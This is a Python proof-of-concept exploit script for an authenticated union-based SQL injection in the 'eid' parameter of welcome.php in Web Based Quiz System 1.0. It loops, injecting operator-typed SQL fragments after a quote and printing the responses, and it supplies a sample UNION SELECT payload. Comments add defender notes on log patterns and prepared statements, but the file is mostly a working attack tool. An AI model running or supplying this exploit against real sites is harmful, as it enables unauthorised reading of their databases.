'''
# Exploit Title: Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)
# Date: 04-03-2021
# Exploit Author: Deepak Kumar Bharti
# Vendor Homepage: https://www.sourcecodester.com
# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
# Software: Web Based Quiz System
PoC made in python by Nano
'''
import requests, sys
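def main():
    """Interactive proof of concept for the authenticated 'eid' SQL injection.

    Prompts for a base site URL, checks that ``welcome.php`` answers with
    HTTP 200, then loops forever: each iteration reads a SQL fragment from
    the operator, appends it after a single quote to the ``eid`` query
    parameter of ``welcome.php``, and prints the raw response body.

    The ``PHPSESSID`` cookie is empty as shipped. The banner tells the
    operator to edit a valid session id into the code first, which matches
    the "(Authenticated)" label in the header.

    Defender notes:
        * The request shape sent here, a single quote followed by SQL
          keywords inside ``eid``, is the pattern to search for in
          web-server access logs and to cover with WAF/IDS rules.
        * NOTE(review): the server-side code is not shown here. The
          behaviour implies ``eid`` is concatenated into a query string;
          the usual remedy is a prepared statement with ``eid`` bound as a
          parameter. Confirm against the application source.
    """
    print("U Need to Set PHPSESSID Before u Continue EDIT CODE")
    siteinput = input('site: ')

    # Bound every request so an unresponsive host cannot hang the script.
    timeout_seconds = 10

    # Reachability probe only: HTTP 200 shows that welcome.php exists, not
    # that the installation is vulnerable, so the message printed below is
    # stronger than what this check establishes.
    req = requests.get(f"{siteinput}/welcome.php", timeout=timeout_seconds)
    if req.status_code != 200:
        print("NOT VULN")
        sys.exit()

    # Both dicts are loop-invariant, so they are built once.
    # Session cookie for the authenticated page (empty until edited).
    cookies = {
        "PHPSESSID": "",
    }
    # Headers imitating a desktop Chrome browser. For detection, this means
    # the User-Agent alone will not distinguish these requests in logs.
    header = {
        "upgrade-insecure-requests": "1",
        "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36",
    }

    while True:
        print("Example Payloads: Union Select 1,database(),database(),4,5-- -")
        sql = input('SQLPAYLOADS: ')
        # The fragment is placed into the query string exactly as typed.
        req1 = requests.get(
            f"{siteinput}/welcome.php?q=quiz&step=2&eid=60377db362694' {sql}&n=2&t=34",
            cookies=cookies,
            headers=header,
            timeout=timeout_seconds,
        )
        print(req1.text)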
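# Start the interactive prompt only when the file is executed as a script,
# so importing the module (for review or tooling) sends no requests.
if __name__ == "__main__":
    main()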